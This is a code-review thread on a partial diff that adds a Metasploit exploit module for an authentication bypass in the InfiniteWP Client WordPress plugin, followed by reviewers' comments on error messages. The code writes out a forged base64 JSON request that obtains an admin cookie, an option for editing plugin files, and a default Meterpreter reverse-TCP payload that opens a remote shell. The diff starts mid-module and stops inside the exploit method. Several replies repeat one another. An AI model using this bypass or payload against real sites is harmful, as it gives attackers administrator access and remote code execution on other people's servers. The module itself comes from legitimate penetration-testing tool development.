modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb

```diff
@@ -0,0 +1,177 @@
+      },
+      'Author'         => [
+        'WebARX', # Discovery
+        'wvu'     # Module
+      ],
+      'References'     => [
+        ['WPVDB', '10011'],
+        ['URL', 'https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/'],
+        ['URL', 'https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/'],
+        ['URL', 'https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html']
+      ],
+      'DisclosureDate' => '2020-01-14',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Privileged'     => false,
+      'Targets'        => [['InfiniteWP Client < 1.9.4.5', {}]],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/reverse_tcp'}
+    ))
+
+    register_options([
+      OptString.new('USERNAME',    [true, 'WordPress username', 'admin']),
+      OptString.new('PLUGIN_FILE', [true, 'Plugin file to edit', 'index.php'])
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit',   [false, 'Override check result', false]),
+      OptBool.new('VerifyContents', [false, 'Verify file contents', true])
+    ])
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def plugin_file
+    datastore['PLUGIN_FILE']
+  end
+
+  def plugin_uri
+    normalize_uri(wordpress_url_plugins, plugin_file)
+  end
+
+  def check
+    unless wordpress_and_online?
+      return CheckCode::Unknown('Is the site online and running WordPress?')
+    end
+
+    unless (version = wordpress_version)
+      return CheckCode::Unknown('Could not detect WordPress version')
+    end
+
+    if Gem::Version.new(version) >= Gem::Version.new('5.0')
+      return CheckCode::Safe("WordPress #{version} is an unsupported target")
+    end
+
+    check_version_from_custom_file(
+      normalize_uri(wordpress_url_plugins, '/iwp-client/readme.txt'),
+      /^= ([\d.]+)/,
+      '1.9.4.5'
+    )
+  end
+
+  # https://plugins.trac.wordpress.org/browser/iwp-client/tags/1.9.4.4/init.php
+  def auth_bypass
+    json = {
+      'iwp_action' => %w[add_site readd_site].sample,
+      'params'     => {'username' => username}
+    }.to_json
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => wordpress_url_backend,
+      'data'   => "_IWP_JSON_PREFIX_#{Rex::Text.encode_base64(json)}"
+    )
+
+    unless res && res.code == 200 && !(cookie = res.get_cookies).empty?
+      fail_with(Failure::NoAccess, "Could not obtain cookie for #{username}")
+    end
+
+    print_good("Successfully obtained cookie for #{username}")
+    vprint_status("Cookie: #{cookie}")
+
+    cookie
+  end
+
+  def exploit
+    unless datastore['ForceExploit']
+      if [CheckCode::Unknown, CheckCode::Safe].include?(check)
+        fail_with(Failure::Unknown, 'Set ForceExploit to override')
+      end
+    end
```

Comment:
This is a really nice catch method for the wrong version being used, but the message it output's is a little unclear:
`Exploit aborted due to failure: unknown: Set ForceExploit to override`

Could you use `Failure::NotVulnerable` and change the message to something like `Target wordpress version is not vulnerable. Set ForceExploit to true if you still wish to attempt an exploit.`

Reply:
You've highlighted precisely what the MS-4906 Jira ticket is for. :)

Reply:
You've highlighted precisely what the MS-4905 Jira ticket is for. :)

Reply:
I added this at the last minute and forgot to change it to a `case`. Whoops.

Should look something like this:

https://github.com/rapid7/metasploit-framework/blob/44030bd7847d4701a0004c15f6b5e153057cc0fd/modules/exploits/linux/http/citrix_dir_traversal_rce.rb#L85-L94

Reply:
You've highlighted precisely what the MS-4905 Jira ticket is for. :)

I added this at the last minute and forgot to change it to a `case`. Whoops.

Should look something like this:

https://github.com/rapid7/metasploit-framework/blob/44030bd7847d4701a0004c15f6b5e153057cc0fd/modules/exploits/linux/http/citrix_dir_traversal_rce.rb#L85-L94

This is the new pattern I'm going for to address the laziness explained in the ticket.

Reply:
You've highlighted precisely what the MS-4905 Jira ticket is for. :)

I added this at the last minute and forgot to change it to a `case`. Whoops.

Should look something like this:

https://github.com/rapid7/metasploit-framework/blob/44030bd7847d4701a0004c15f6b5e153057cc0fd/modules/exploits/linux/http/citrix_dir_traversal_rce.rb#L85-L94

This is the new pattern I'm going for to address the laziness explained in the ticket. It is not final, but it should be further updated by the PR I'll put up for it. A lot of modules may change as a result. Really, anything better than a generic error is desired.

Reply:
Resolved with `AutoCheck` mixin. Will refactor other modules later.